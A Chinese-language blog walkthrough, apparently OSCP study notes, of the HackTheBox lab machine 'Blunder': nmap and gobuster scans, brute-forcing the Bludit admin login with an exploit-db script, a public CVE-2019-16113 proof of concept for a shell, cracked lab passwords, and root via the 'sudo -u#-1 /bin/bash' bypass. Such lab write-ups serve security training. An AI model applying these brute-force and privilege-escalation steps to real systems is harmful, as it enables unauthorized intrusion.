OSCP备考_0x28_HackThBox靶机_Linux_blunder

Ethan医生2个月前靶场86

blunder

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.193.124 (扫描UDP)

image.png



gobuster dir -u http://10.129.193.124/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png0


http://10.129.193.124/todo.txt ,发现有fergus用户

image.png

查看有没有漏洞

image.png

python3 48942.py -l http://10.129.193.124/admin/login.php -u user.txt -p /usr/share/wordlists/my_list/passwd-EN-Top10000.txt


进行爆破

最后发现密码为RolandDeschain




我们获得密码之后还是无法登录

在我们搜索bludit得时候我们看不到rce,然后使用这个脚本,但是要将脚本进行修改才能使用

https://github.com/hg8/CVE-2019-16113-PoC



然后执行脚本就获得shell


image.png

这个密码爆破不了

然后就去另一个版本里面找答案bludit-3.10.0a

然后使用在线的破解工具

hugo,Password120

切换到hugo然后执行sudo -l

发现可以使用/bin/bash

然后使用sudo -u#-1 /bin/bash获得root


标签: OSCP

相关文章

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。